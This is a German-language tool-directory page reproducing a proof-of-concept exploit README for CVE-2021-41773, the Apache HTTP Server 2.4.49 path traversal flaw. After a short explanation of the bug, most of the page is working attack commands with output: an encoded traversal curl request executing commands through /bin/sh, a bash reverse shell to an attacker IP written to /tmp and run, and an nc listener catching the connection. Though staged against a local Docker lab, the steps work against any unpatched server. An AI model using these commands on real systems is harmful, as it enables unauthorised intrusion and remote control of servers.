Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41773-L- — Proof-of-Concept-Exploit für CVE-2021-41773, der Path Traversal und Remote Code Execution auf Apache HTTP Server 2.4.49 mit einem Reverse-Shell-Payload demonstriert. | Kitploit
Tools/GitHubGitHub/mightysai1997/cve-2021-41773-l-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubmightysai1997/cve-2021-41773-l-

CVE-2021-41773-L-

Proof-of-Concept-Exploit für CVE-2021-41773, der Path Traversal und Remote Code Execution auf Apache HTTP Server 2.4.49 mit einem Reverse-Shell-Payload demonstriert.

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773

🐛 Path-Traversal- und Datei-Offenlegungssicherheitslücke in Apache HTTP Server 2.4.49

Ein Fehler wurde in einer Änderung zur Pfadnormalisierung in Apache HTTP Server 2.4.49 gefunden. Ein Angreifer könnte einen Path-Traversal-Angriff nutzen, um URLs auf Dateien außerhalb der durch Alias-ähnliche Direktiven konfigurierten Verzeichnisse abzubilden.

Wenn Dateien außerhalb dieser Verzeichnisse nicht durch die übliche Standardkonfiguration "require all denied" geschützt sind, können diese Anfragen erfolgreich sein. Wenn CGI-Skripte auch für diese Alias-Pfade aktiviert sind, könnte dies eine Remotecodeausführung ermöglichen.

Dieses Problem wird bekanntermaßen im Internet ausgenutzt.

Dieses Problem betrifft nur Apache 2.4.49 und nicht frühere Versionen.

source

Pfad-Traversal

Übersicht

Ein Path-Traversal-Angriff (auch als Directory Traversal bekannt) zielt darauf ab, auf Dateien und Verzeichnisse zuzugreifen, die außerhalb des Web-Root-Ordners gespeichert sind. Durch Manipulation von Variablen, die auf Dateien mit 'Punkt-Punkt-Schrägstrich (../)'-Sequenzen und deren Variationen verweisen, oder durch Verwendung absoluter Dateipfade kann es möglich sein, auf beliebige Dateien und Verzeichnisse im Dateisystem zuzugreifen, einschließlich Anwendungsquellcode oder Konfigurations- und kritischer Systemdateien. Es ist zu beachten, dass der Zugriff auf Dateien durch die betriebliche Zugriffskontrolle des Systems eingeschränkt ist (z. B. bei gesperrten oder in Verwendung befindlichen Dateien unter Microsoft Windows).

Dieser Angriff ist auch als 'Dot-Dot-Slash', 'Directory Traversal', 'Directory Climbing' und 'Backtracking' bekannt.

Proof Of Concept

Einrichtung der PoC-Umgebung

root@kitploit:~
$ docker-compose build
$ docker-compose up

Bestätigung der Funktion

root@kitploit:~
$ curl http://localhost:1234
<html><body><h1>It works!</h1></body></html>

Exploit

Opfer : localhost:1234
Angreifer : 192.168.1.12

Laut Dokumentation handelt es sich um einen Fehler, der es uns ermöglicht, Code auf entfernten Systemen auszuführen (RCE).
Wir können dies ausnutzen, indem wir einen curl-Befehl mit dem cgi-bin-Ordner ausführen.

root@kitploit:~
$ curl 'http://<victim_ip>/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; <command>'
  • 1. RCE
    Prüfen wir, ob wir tatsächlich Zugriff auf Befehle haben, z. B. id :

    root@kitploit:~
    $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; id'
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    
  • 2. Reverse Shell
    Wir werden eine Reverse Shell testen, indem wir eine Bash-Datei auf dem Server des Opfers erstellen.
    Nehmen wir als Beispiel die Reverse Shell in Bash aus dem PayloadsAllTheThings Repository.

    Hier ist ein Beispiel :
    bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

    Erstellen wir die Datei vuln.sh auf dem Rechner des Opfers im Ordner /tmp/ !
    Diese Datei enthält unsere Reverse Shell, die wir remote ausführen können. Sie wird eine Verbindung zu unserem lokalen Rechner auf Port 44 herstellen.

    root@kitploit:~
    $  curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; echo "#!/bin/bash\nbash -i >& /dev/tcp/192.168.1.12/44 0>&1" > /tmp/vuln.sh'
    

    Sie können den Inhalt der Datei mit dem Befehl überprüfen

Referenzen

  • https://httpd.apache.org/security/vulnerabilities_24.html
  • https://github.com/apache/httpd/commit/98246aa96079dad5f7b20521bbc0142a04f1c5e7
Tool herunterladen
cat
root@kitploit:~
$ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; cat /tmp/vuln.sh'
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.12/44 0>&1
  • 3. Listener mit ncat
    Erstellen wir den Listener auf dem lokalen Rechner.

    root@kitploit:~
    $ nc -lvnp 44
    

    Es bleibt nur noch, die entfernte Datei auszuführen.

    root@kitploit:~
    $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:
    text/plain; echo; bash /tmp/vuln.sh'
    

    Antwort :

    root@kitploit:~
    Ncat: Version 7.91 ( https://nmap.org/ncat )
    Ncat: Listening on :::44
    Ncat: Listening on 0.0.0.0:44
    Ncat: Connection from 172.19.32.1.
    Ncat: Connection from 172.19.32.1:58963.